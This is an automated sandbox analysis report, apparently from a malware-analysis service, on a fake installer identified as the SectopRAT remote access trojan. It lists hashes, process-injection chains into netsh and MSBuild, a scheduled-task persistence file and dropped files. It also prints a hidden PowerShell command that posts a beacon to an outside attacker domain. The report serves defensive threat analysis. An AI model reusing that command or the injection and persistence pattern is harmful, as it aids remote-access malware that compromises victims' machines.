sectoprat | 78eea64a981219170ff45c927d11747c4c4d0f2baf0ebccef02e4fa82ea15007

Resubmissions

22-05-2024 14:36

240522-ry24msef2z 10

21-05-2024 21:41

240521-1j91dabd33 10

Analysis

max time kernel
1783s
max time network
1785s
platform
windows11-21h2_x64
resource
win11-20240419-en
resource tags

arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
submitted
21-05-2024 21:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SetupSuite_2024.24230_win64.exe
Size

18.4MB
MD5

94dc7cce9cd15f55fb3f289bd723f567
SHA1

5487cd6f476b90b544754f017329d9894d6513e3
SHA256

78eea64a981219170ff45c927d11747c4c4d0f2baf0ebccef02e4fa82ea15007
SHA512

3760f2e225e7919bd4f3a2a9cd0e5eead3cc409c6f44eaa3d7a44fe2639de749f0640b19b8997ac53679c5b824c05d6d5ae3b9105c0c63efbc1cecda345d28cb
SSDEEP

393216:GZRCQ9WLcKS1wNLH04sjYyQ0KSW9MoEvwyhWgJcgtE6W:ioQHargYyWSpvwPgJc4xW

Score

10^/10

sectoprat execution rat trojan

Malware Config

Signatures

SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3464-70-0x0000000000C10000-0x0000000000CD6000-memory.dmp	family_sectoprat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 4132 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

4132 powershell.exe

flow	pid	process
4	4132	powershell.exe

pid	process
4132	powershell.exe

Executes dropped EXE 10 IoCs

Processes:

tmpCE8B.tmp.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exeOrtosLauncher.exe

pid	process
736	tmpCE8B.tmp.exe
232	OrtosLauncher.exe
4800	OrtosLauncher.exe
4432	OrtosLauncher.exe
5016	OrtosLauncher.exe
3096	OrtosLauncher.exe
4564	OrtosLauncher.exe
2688	OrtosLauncher.exe
4628	OrtosLauncher.exe
3536	OrtosLauncher.exe

Suspicious use of SetThreadContext 22 IoCs

Processes:

SetupSuite_2024.24230_win64.exenetsh.exetmpCE8B.tmp.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exe

description	pid	process	target process
PID 684 set thread context of 1100	684	SetupSuite_2024.24230_win64.exe	netsh.exe
PID 1100 set thread context of 3756	1100	netsh.exe	MSBuild.exe
PID 736 set thread context of 2668	736	tmpCE8B.tmp.exe	netsh.exe
PID 2668 set thread context of 3464	2668	netsh.exe	MSBuild.exe
PID 232 set thread context of 1016	232	OrtosLauncher.exe	netsh.exe
PID 1016 set thread context of 4900	1016	netsh.exe	MSBuild.exe
PID 4800 set thread context of 3900	4800	OrtosLauncher.exe	netsh.exe
PID 3900 set thread context of 788	3900	netsh.exe	MSBuild.exe
PID 4432 set thread context of 2880	4432	OrtosLauncher.exe	netsh.exe
PID 2880 set thread context of 1200	2880	netsh.exe	MSBuild.exe
PID 5016 set thread context of 3740	5016	OrtosLauncher.exe	netsh.exe
PID 3740 set thread context of 2324	3740	netsh.exe	MSBuild.exe
PID 3096 set thread context of 2296	3096	OrtosLauncher.exe	netsh.exe
PID 2296 set thread context of 2036	2296	netsh.exe	MSBuild.exe
PID 4564 set thread context of 3488	4564	OrtosLauncher.exe	netsh.exe
PID 3488 set thread context of 5096	3488	netsh.exe	MSBuild.exe
PID 2688 set thread context of 1016	2688	OrtosLauncher.exe	netsh.exe
PID 1016 set thread context of 4856	1016	netsh.exe	MSBuild.exe
PID 4628 set thread context of 1868	4628	OrtosLauncher.exe	netsh.exe
PID 1868 set thread context of 1928	1868	netsh.exe	MSBuild.exe
PID 3536 set thread context of 4600	3536	OrtosLauncher.exe	netsh.exe
PID 4600 set thread context of 2448	4600	netsh.exe	MSBuild.exe

Drops file in Windows directory 1 IoCs

Processes:

netsh.exe

description ioc process

File created C:\Windows\Tasks\Ortos Launcher.job netsh.exe

description	ioc	process
File created	C:\Windows\Tasks\Ortos Launcher.job	netsh.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

SetupSuite_2024.24230_win64.exepowershell.exenetsh.exetmpCE8B.tmp.exenetsh.exeMSBuild.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exe

pid	process
684	SetupSuite_2024.24230_win64.exe
684	SetupSuite_2024.24230_win64.exe
4132	powershell.exe
4132	powershell.exe
1100	netsh.exe
1100	netsh.exe
736	tmpCE8B.tmp.exe
736	tmpCE8B.tmp.exe
2668	netsh.exe
2668	netsh.exe
3464	MSBuild.exe
3464	MSBuild.exe
232	OrtosLauncher.exe
232	OrtosLauncher.exe
1016	netsh.exe
1016	netsh.exe
4800	OrtosLauncher.exe
4800	OrtosLauncher.exe
3900	netsh.exe
3900	netsh.exe
4432	OrtosLauncher.exe
4432	OrtosLauncher.exe
2880	netsh.exe
2880	netsh.exe
5016	OrtosLauncher.exe
5016	OrtosLauncher.exe
3740	netsh.exe
3740	netsh.exe
3096	OrtosLauncher.exe
3096	OrtosLauncher.exe
2296	netsh.exe
2296	netsh.exe
4564	OrtosLauncher.exe
4564	OrtosLauncher.exe
3488	netsh.exe
3488	netsh.exe
2688	OrtosLauncher.exe
2688	OrtosLauncher.exe
1016	netsh.exe
1016	netsh.exe
4628	OrtosLauncher.exe
4628	OrtosLauncher.exe
1868	netsh.exe
1868	netsh.exe
3536	OrtosLauncher.exe
3536	OrtosLauncher.exe
4600	netsh.exe
4600	netsh.exe

Suspicious behavior: MapViewOfSection 33 IoCs

Processes:

pid	process
684	SetupSuite_2024.24230_win64.exe
1100	netsh.exe
1100	netsh.exe
736	tmpCE8B.tmp.exe
2668	netsh.exe
2668	netsh.exe
232	OrtosLauncher.exe
1016	netsh.exe
1016	netsh.exe
4800	OrtosLauncher.exe
3900	netsh.exe
3900	netsh.exe
4432	OrtosLauncher.exe
2880	netsh.exe
2880	netsh.exe
5016	OrtosLauncher.exe
3740	netsh.exe
3740	netsh.exe
3096	OrtosLauncher.exe
2296	netsh.exe
2296	netsh.exe
4564	OrtosLauncher.exe
3488	netsh.exe
3488	netsh.exe
2688	OrtosLauncher.exe
1016	netsh.exe
1016	netsh.exe
4628	OrtosLauncher.exe
1868	netsh.exe
1868	netsh.exe
3536	OrtosLauncher.exe
4600	netsh.exe
4600	netsh.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeMSBuild.exeMSBuild.exe

description pid process

Token: SeDebugPrivilege 4132 powershell.exe
Token: SeDebugPrivilege 3756 MSBuild.exe
Token: SeDebugPrivilege 3464 MSBuild.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid process

3464 MSBuild.exe

description	pid	process
Token: SeDebugPrivilege	4132	powershell.exe
Token: SeDebugPrivilege	3756	MSBuild.exe
Token: SeDebugPrivilege	3464	MSBuild.exe

pid	process
3464	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SetupSuite_2024.24230_win64.execmd.execmd.exenetsh.exeMSBuild.exetmpCE8B.tmp.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exenetsh.exeOrtosLauncher.exe

description	pid	process	target process
PID 684 wrote to memory of 4596	684	SetupSuite_2024.24230_win64.exe	cmd.exe
PID 684 wrote to memory of 4596	684	SetupSuite_2024.24230_win64.exe	cmd.exe
PID 4596 wrote to memory of 792	4596	cmd.exe	cmd.exe
PID 4596 wrote to memory of 792	4596	cmd.exe	cmd.exe
PID 792 wrote to memory of 4132	792	cmd.exe	powershell.exe
PID 792 wrote to memory of 4132	792	cmd.exe	powershell.exe
PID 684 wrote to memory of 1100	684	SetupSuite_2024.24230_win64.exe	netsh.exe
PID 684 wrote to memory of 1100	684	SetupSuite_2024.24230_win64.exe	netsh.exe
PID 684 wrote to memory of 1100	684	SetupSuite_2024.24230_win64.exe	netsh.exe
PID 684 wrote to memory of 1100	684	SetupSuite_2024.24230_win64.exe	netsh.exe
PID 1100 wrote to memory of 3756	1100	netsh.exe	MSBuild.exe
PID 1100 wrote to memory of 3756	1100	netsh.exe	MSBuild.exe
PID 1100 wrote to memory of 3756	1100	netsh.exe	MSBuild.exe
PID 1100 wrote to memory of 3756	1100	netsh.exe	MSBuild.exe
PID 1100 wrote to memory of 3756	1100	netsh.exe	MSBuild.exe
PID 3756 wrote to memory of 736	3756	MSBuild.exe	tmpCE8B.tmp.exe
PID 3756 wrote to memory of 736	3756	MSBuild.exe	tmpCE8B.tmp.exe
PID 3756 wrote to memory of 736	3756	MSBuild.exe	tmpCE8B.tmp.exe
PID 736 wrote to memory of 2668	736	tmpCE8B.tmp.exe	netsh.exe
PID 736 wrote to memory of 2668	736	tmpCE8B.tmp.exe	netsh.exe
PID 736 wrote to memory of 2668	736	tmpCE8B.tmp.exe	netsh.exe
PID 736 wrote to memory of 2668	736	tmpCE8B.tmp.exe	netsh.exe
PID 2668 wrote to memory of 3464	2668	netsh.exe	MSBuild.exe
PID 2668 wrote to memory of 3464	2668	netsh.exe	MSBuild.exe
PID 2668 wrote to memory of 3464	2668	netsh.exe	MSBuild.exe
PID 2668 wrote to memory of 3464	2668	netsh.exe	MSBuild.exe
PID 2668 wrote to memory of 3464	2668	netsh.exe	MSBuild.exe
PID 232 wrote to memory of 1016	232	OrtosLauncher.exe	netsh.exe
PID 232 wrote to memory of 1016	232	OrtosLauncher.exe	netsh.exe
PID 232 wrote to memory of 1016	232	OrtosLauncher.exe	netsh.exe
PID 232 wrote to memory of 1016	232	OrtosLauncher.exe	netsh.exe
PID 1016 wrote to memory of 4900	1016	netsh.exe	MSBuild.exe
PID 1016 wrote to memory of 4900	1016	netsh.exe	MSBuild.exe
PID 1016 wrote to memory of 4900	1016	netsh.exe	MSBuild.exe
PID 1016 wrote to memory of 4900	1016	netsh.exe	MSBuild.exe
PID 1016 wrote to memory of 4900	1016	netsh.exe	MSBuild.exe
PID 4800 wrote to memory of 3900	4800	OrtosLauncher.exe	netsh.exe
PID 4800 wrote to memory of 3900	4800	OrtosLauncher.exe	netsh.exe
PID 4800 wrote to memory of 3900	4800	OrtosLauncher.exe	netsh.exe
PID 4800 wrote to memory of 3900	4800	OrtosLauncher.exe	netsh.exe
PID 3900 wrote to memory of 788	3900	netsh.exe	MSBuild.exe
PID 3900 wrote to memory of 788	3900	netsh.exe	MSBuild.exe
PID 3900 wrote to memory of 788	3900	netsh.exe	MSBuild.exe
PID 3900 wrote to memory of 788	3900	netsh.exe	MSBuild.exe
PID 3900 wrote to memory of 788	3900	netsh.exe	MSBuild.exe
PID 4432 wrote to memory of 2880	4432	OrtosLauncher.exe	netsh.exe
PID 4432 wrote to memory of 2880	4432	OrtosLauncher.exe	netsh.exe
PID 4432 wrote to memory of 2880	4432	OrtosLauncher.exe	netsh.exe
PID 4432 wrote to memory of 2880	4432	OrtosLauncher.exe	netsh.exe
PID 2880 wrote to memory of 1200	2880	netsh.exe	MSBuild.exe
PID 2880 wrote to memory of 1200	2880	netsh.exe	MSBuild.exe
PID 2880 wrote to memory of 1200	2880	netsh.exe	MSBuild.exe
PID 2880 wrote to memory of 1200	2880	netsh.exe	MSBuild.exe
PID 2880 wrote to memory of 1200	2880	netsh.exe	MSBuild.exe
PID 5016 wrote to memory of 3740	5016	OrtosLauncher.exe	netsh.exe
PID 5016 wrote to memory of 3740	5016	OrtosLauncher.exe	netsh.exe
PID 5016 wrote to memory of 3740	5016	OrtosLauncher.exe	netsh.exe
PID 5016 wrote to memory of 3740	5016	OrtosLauncher.exe	netsh.exe
PID 3740 wrote to memory of 2324	3740	netsh.exe	MSBuild.exe
PID 3740 wrote to memory of 2324	3740	netsh.exe	MSBuild.exe
PID 3740 wrote to memory of 2324	3740	netsh.exe	MSBuild.exe
PID 3740 wrote to memory of 2324	3740	netsh.exe	MSBuild.exe
PID 3740 wrote to memory of 2324	3740	netsh.exe	MSBuild.exe
PID 3096 wrote to memory of 2296	3096	OrtosLauncher.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\SetupSuite_2024.24230_win64.exe
"C:\Users\Admin\AppData\Local\Temp\SetupSuite_2024.24230_win64.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c start /min "" "C:\Users\Admin\AppData\Roaming\Hhs_client_4\UZPWVFRAFQUTYVI\st.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4596

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Hhs_client_4\UZPWVFRAFQUTYVI\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "try { Invoke-RestMethod 'https://fvruq7f3npuzx535.fieles-pro.online/__stat/7171717692/post.php' -Method Post -Body (@{source_id='drop1'} | ConvertTo-Json) -ContentType 'application/json' -Headers @{ 'User-Agent' = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' } } catch {}"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4132

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1100

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3756

C:\Users\Admin\AppData\Local\Temp\tmpCE8B.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpCE8B.tmp.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:736

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
5⤵
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3464

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:232

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:4900

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:788

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:4432

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:1200

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:5016

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3740

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:2324

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3096

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2296

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:2036

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4564

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3488

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:5096

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2688

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1016

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:4856

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4628

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1868

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:1928

C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
C:\Users\Admin\AppData\Roaming\SecurityUpdate\OrtosLauncher.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3536

C:\Windows\SysWOW64\netsh.exe
C:\Windows\SysWOW64\netsh.exe
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4600

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
3⤵
PID:2448

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log
Filesize
1KB

MD5
a199bb80fd78806046bd2c3ba0e899ff

SHA1
8211d6d66dabb26b55c88bd6e1a162ac53652015

SHA256
96669ecdd0f995f2ed7451f63c908763a7a1c48bd29aded0510b00d6fb2afd6e

SHA512
a04a82bef6e1e8cadb4bf220731a12ad80dcde1490a4f009105cf33ae737f77d604d7926008f40743a0429099c6b53dae7a17f9d8583189ce9a705fc224be25f

Download Submit
C:\Users\Admin\AppData\Local\Temp\63f6570c
Filesize
1.4MB

MD5
bb79b37303351aed686bafdbda965145

SHA1
29dfc99df03ebeba465887c1c93990244010701f

SHA256
832bd77a59171267e41c2559bce0abd6c8a5d172367726dd289f3fc133beae29

SHA512
6cb74f6fe35775c562cbf1c8126d633259e4b6077638fff57f70326bac8e3a0e6deaa7ca26de9bab6364cf88fa750bfb7c2af6cde82f73ed731989685b75de8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\68a607cb
Filesize
1.4MB

MD5
b2d4ad2d55009a6147ece47ccbd312cd

SHA1
8e66e54b20e18de68d795caf8035710154fa6222

SHA256
d44aed274ff9a957cac2fbdd87a0ed19b7c882d2b0ad147f207036eef3ea5483

SHA512
2f04ee74e683ba232070ed1c91a441fea0e54aba522b853245a276c519b65d1bd6fb4d4bde86208ff5c56af907fe7360ec9cc838d37eed44b91ed15e6675942e

Download Submit
C:\Users\Admin\AppData\Local\Temp\89d8f4dd
Filesize
947KB

MD5
b067b9f4a268cf0826971f23945b22f3

SHA1
1c595559c194dd23a5a9e95a79ceb92286f9b7b9

SHA256
9d0bb116194f6bc313879a6bf119060a881a440ba04f1c715e2ef964684e22b4

SHA512
90b6213d3cfde4c6419b6dda239e499fc1f8f3ab3e033e5431c7f1bf4fe559599174ff54d343c2cb1fb578da6eb226d063f7211b9f308aae4b1b8abf5811939a

Download Submit
C:\Users\Admin\AppData\Local\Temp\8c8292fe
Filesize
716KB

MD5
67e1c31505ea9f30527c14deeb07caf4

SHA1
bd9f4ff79a11ea70e868f1c04ded9b1abdac7312

SHA256
ff1aac25fff549dc53a0cfce9a4095256ae8a08207757c508e51bf1e941d9afc

SHA512
b7fda5232bee9a29dda190c19a981800dae80e5c2d760f4c2a7eef1ed9c872baf327c722ece88b965adfc23596dcac0b7796af9099f1bc445f7890329ae3df10

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qsxjadhl.nnc.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f9034e6a
Filesize
1.4MB

MD5
6bfe5c676d5ad29c1650761bca8e6ad8

SHA1
7de09ccad07d6c67de473d08428377679c096afb

SHA256
d02aa53de27ce8faf9e45d24e66ea39e9e305fb68a70b3d5cdf9a89e32bb6c54

SHA512
ce47dbdb095366ac627b8c2104c8ed017563d57f23cae603d1a869428ef3ff876f3c62b476f581e0a0cc70f22f5b062c5250c847f5b786450cbf7590db7f41a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp45E0.tmp
Filesize
20KB

MD5
a603e09d617fea7517059b4924b1df93

SHA1
31d66e1496e0229c6a312f8be05da3f813b3fa9e

SHA256
ccd15f9c7a997ae2b5320ea856c7efc54b5055254d41a443d21a60c39c565cb7

SHA512
eadb844a84f8a660c578a2f8e65ebcb9e0b9ab67422be957f35492ff870825a4b363f96fd1c546eaacfd518f6812fcf57268ef03c149e5b1a7af145c7100e2cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4612.tmp
Filesize
20KB

MD5
22be08f683bcc01d7a9799bbd2c10041

SHA1
2efb6041cf3d6e67970135e592569c76fc4c41de

SHA256
451c2c0cf3b7cb412a05347c6e75ed8680f0d2e5f2ab0f64cc2436db9309a457

SHA512
0eef192b3d5abe5d2435acf54b42c729c3979e4ad0b73d36666521458043ee7df1e10386bef266d7df9c31db94fb2833152bb2798936cb2082715318ef05d936

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpCE8B.tmp.exe
Filesize
6.6MB

MD5
064d9b8a16b733266a651332c622a54e

SHA1
a15f053b71cda0497efdec08b4680267b936024d

SHA256
8e723f79d696edac7fa9da08d07dd796b4fa6f56886a2f10ea66e618bf0273f1

SHA512
18cee323ab07689c6e030d647f0296ec97a12af860fce2252d72d11f3f54c69aca266329fa58cf08213417fd0de54dfab7477a3d9923e83812470fa1b8c79110

Download Submit
C:\Users\Admin\AppData\Roaming\Hhs_client_4\UZPWVFRAFQUTYVI\st.bat
Filesize
2KB

MD5
4f67b284c4d47193e6406331981df83b

SHA1
11d2317531c89a4f7faf8c72fb1cc6abb169b56b

SHA256
8e1ec3afa595402444206ca09edcc86247a50f7cd8a71be3f4928a34228ba168

SHA512
9a3ca36bc10043f0684a05faad606efae2d9959015b30d454c7d1d907553d130a4dcca8fac811a204431b7c23a6512a83ba0a555eef7a312c9a2655ea4cc30f3

Download Submit
C:\Windows\Tasks\Ortos Launcher.job
Filesize
300B

MD5
f672f48cdf5a081f455445ad54a1e91b

SHA1
3d2313555adc2cd4b048dde6892611b93b2e5bd1

SHA256
c6a9dc807fe5f4f81da3334abadb80705740a5532aecc8b4f1319df00fd7291f

SHA512
470e87a002c3129a9f6ae4d85f4284825c0b786168968583e93e519552a71e076cbb88a6ca580c0a31ff5f3f305088c97fe9fbcbc40c23e9f3e168e824b8709c

Download Submit
memory/232-262-0x0000000000400000-0x0000000000AC3000-memory.dmp

Filesize
6.8MB

Download
memory/232-270-0x000000006E8C0000-0x000000006EA3D000-memory.dmp

Filesize
1.5MB

Download
memory/232-269-0x00007FFEF68C0000-0x00007FFEF6AC9000-memory.dmp

Filesize
2.0MB

Download
memory/232-268-0x000000006E8C0000-0x000000006EA3D000-memory.dmp

Filesize
1.5MB

Download
memory/684-30-0x00007FFED5E30000-0x00007FFED5FAA000-memory.dmp

Filesize
1.5MB

Download
memory/684-10-0x00007FFED5E30000-0x00007FFED5FAA000-memory.dmp

Filesize
1.5MB

Download
memory/684-6-0x00007FFED5E30000-0x00007FFED5FAA000-memory.dmp

Filesize
1.5MB

Download
memory/684-8-0x00007FFED5E30000-0x00007FFED5FAA000-memory.dmp

Filesize
1.5MB

Download
memory/684-9-0x00007FFED5E48000-0x00007FFED5E49000-memory.dmp

Filesize
4KB

Download
memory/684-0-0x0000000140000000-0x0000000140445000-memory.dmp

Filesize
4.3MB

Download
memory/736-57-0x0000000074780000-0x00000000748FD000-memory.dmp

Filesize
1.5MB

Download
memory/736-58-0x00007FFEF68C0000-0x00007FFEF6AC9000-memory.dmp

Filesize
2.0MB

Download
memory/736-59-0x0000000074780000-0x00000000748FD000-memory.dmp

Filesize
1.5MB

Download
